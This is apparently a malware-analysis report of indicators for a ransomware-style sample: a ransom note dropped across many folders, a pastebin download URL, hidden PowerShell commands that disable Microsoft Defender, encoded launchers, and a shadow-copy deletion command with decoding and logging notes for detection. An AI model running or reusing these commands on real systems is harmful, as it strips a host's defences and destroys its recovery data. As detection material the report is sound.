Technical Information
- <Drive name for removable media>:\fn198-readme.txt
- https://pastebin.com/raw/ram5rbub
- firefox.exe
- %HOMEPATH%\desktop\alert.htm
- %HOMEPATH%\desktop\toolbar.bmp
- %HOMEPATH%\desktop\tileimage.bmp
- %HOMEPATH%\desktop\thlps_keeper_mayer_1965.docx
- %HOMEPATH%\desktop\testee.cer
- %HOMEPATH%\desktop\testcertificate.cer
- %HOMEPATH%\desktop\nwfieldnotes1966.docx
- %HOMEPATH%\desktop\iisstart.html
- %HOMEPATH%\desktop\howto-index.html
- %HOMEPATH%\desktop\file_p_00000000_1371597592.docx
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\dashborder_144.bmp
- %HOMEPATH%\desktop\cveuropeo.doc
- %HOMEPATH%\desktop\browse.html
- %HOMEPATH%\desktop\applicantform_en.doc
- %HOMEPATH%\desktop\api-hashmap.html
- %HOMEPATH%\desktop\uep_form_786_bulletin_1726i602.doc
- %HOMEPATH%\desktop\weeklysheet1215.doc
- C:\fn198-readme.txt
- %HOMEPATH%\documents\fn198-readme.txt
- %HOMEPATH%\desktop\fn198-readme.txt
- %HOMEPATH%\contacts\fn198-readme.txt
- C:\users\public\videos\fn198-readme.txt
- C:\users\public\recorded tv\fn198-readme.txt
- C:\users\public\pictures\fn198-readme.txt
- C:\users\public\music\fn198-readme.txt
- C:\users\public\libraries\fn198-readme.txt
- C:\users\public\favorites\fn198-readme.txt
- C:\users\public\downloads\fn198-readme.txt
- C:\users\public\documents\fn198-readme.txt
- C:\users\public\desktop\fn198-readme.txt
- C:\users\default\videos\fn198-readme.txt
- C:\users\default\saved games\fn198-readme.txt
- C:\users\default\pictures\fn198-readme.txt
- C:\users\default\music\fn198-readme.txt
- C:\users\default\links\fn198-readme.txt
- C:\users\default\favorites\fn198-readme.txt
- C:\users\default\downloads\fn198-readme.txt
- C:\users\default\desktop\fn198-readme.txt
- C:\users\default\documents\fn198-readme.txt
- %HOMEPATH%\downloads\fn198-readme.txt
- %HOMEPATH%\favorites\fn198-readme.txt
- %HOMEPATH%\favorites\msn websites\fn198-readme.txt
- %HOMEPATH%\favorites\microsoft websites\fn198-readme.txt
- %HOMEPATH%\favorites\links for united states\fn198-readme.txt
- %HOMEPATH%\favorites\links\fn198-readme.txt
- C:\users\public\videos\sample videos\fn198-readme.txt
- C:\users\public\recorded tv\sample media\fn198-readme.txt
- C:\users\public\pictures\sample pictures\fn198-readme.txt
- C:\users\public\music\sample music\fn198-readme.txt
- %ProgramFiles%\microsoft sql server compact edition\v3.5\desktop\fn198-readme.txt
- C:\far2\addons\xlat\russian\fn198-readme.txt
- C:\far2\plugins\drawline\fn198-readme.txt
- C:\far2\addons\colors\default_highlighting\fn198-readme.txt
- C:\far2\addons\colors\custom_highlighting\fn198-readme.txt
- %HOMEPATH%\voip\fn198-readme.txt
- %HOMEPATH%\videos\fn198-readme.txt
- %HOMEPATH%\searches\fn198-readme.txt
- %HOMEPATH%\saved games\fn198-readme.txt
- %HOMEPATH%\pictures\fn198-readme.txt
- %HOMEPATH%\music\fn198-readme.txt
- %HOMEPATH%\links\fn198-readme.txt
- %ProgramFiles%\microsoft sql server compact edition\v3.5\fn198-readme.txt
- C:\far2\pluginsdk\headers.pas\fn198-readme.txt
- C:\far2\pluginsdk\headers.c\fn198-readme.txt
- C:\users\public\fn198-readme.txt
- C:\users\default\fn198-readme.txt
- C:\totalcmd\language\fn198-readme.txt
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\fn198-readme.txt
- %ProgramFiles%\microsoft sql server compact edition\fn198-readme.txt
- C:\far2\pluginsdk\fn198-readme.txt
- C:\far2\plugins\fn198-readme.txt
- C:\far2\fexcept\fn198-readme.txt
- C:\far2\encyclopedia\fn198-readme.txt
- C:\far2\documentation\fn198-readme.txt
- C:\far2\addons\fn198-readme.txt
- C:\users\fn198-readme.txt
- C:\totalcmd\fn198-readme.txt
- C:\recovery\fn198-readme.txt
- %ProgramFiles(x86)%\fn198-readme.txt
- %ProgramFiles%\fn198-readme.txt
- <Current directory>\fn198-readme.txt
- C:\far2\fn198-readme.txt
- C:\far2\addons\colors\fn198-readme.txt
- C:\far2\addons\macros\fn198-readme.txt
- %HOMEPATH%\fn198-readme.txt
- C:\far2\addons\setup\fn198-readme.txt
- C:\far2\plugins\tmppanel\fn198-readme.txt
- C:\far2\addons\shell\fn198-readme.txt
- C:\far2\plugins\proclist\fn198-readme.txt
- C:\far2\plugins\network\fn198-readme.txt
- C:\far2\plugins\macroview\fn198-readme.txt
- C:\far2\plugins\hlfviewer\fn198-readme.txt
- C:\far2\plugins\ftp\fn198-readme.txt
- C:\far2\plugins\filecase\fn198-readme.txt
- C:\far2\plugins\farcmds\fn198-readme.txt
- C:\far2\plugins\emenu\fn198-readme.txt
- C:\far2\plugins\ftp\lib\fn198-readme.txt
- %HOMEPATH%\favorites\windows live\fn198-readme.txt
- C:\far2\plugins\compare\fn198-readme.txt
- C:\far2\plugins\brackets\fn198-readme.txt
- C:\far2\plugins\autowrap\fn198-readme.txt
- C:\far2\plugins\arclite\fn198-readme.txt
- C:\far2\plugins\align\fn198-readme.txt
- C:\far2\encyclopedia\tap\fn198-readme.txt
- C:\far2\documentation\rus\fn198-readme.txt
- C:\far2\documentation\eng\fn198-readme.txt
- C:\far2\addons\xlat\fn198-readme.txt
- C:\far2\plugins\editcase\fn198-readme.txt
- D:\fn198-readme.txt
- 'pa###bin.com':443
- DNS ASK pa###bin.com
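- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoExit Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disable...' (with hidden window)
  (The visible Set-MpPreference switches turn off Microsoft Defender network intrusion prevention, scanning of downloaded files and attachments (IOAV), real-time monitoring and script scanning, and disable Controlled Folder Access; the rest of the command line is truncated in this listing. Such changes are recorded in the Microsoft-Windows-Windows Defender/Operational log as events 5001 and 5007.)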
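- '%WINDIR%\syswow64\cmd.exe' /c START <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNA...' (with hidden window)
  (The -e argument is Base64-encoded UTF-16LE; the visible prefix decodes to: If($ENV:PROCESSOR_ARCHITECTURE -contains 'AM — the remainder is truncated in this listing, so the script's purpose cannot be determined from it. Where PowerShell script block logging is enabled, the decoded script is recorded as event 4104.)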
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoExit Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disable...
- '%WINDIR%\syswow64\cmd.exe' /c START <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNA...
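- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  (The -e argument is Base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} — it deletes every Volume Shadow Copy on the host, removing local restore points.)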
- '<SYSTEM32>\vssvc.exe'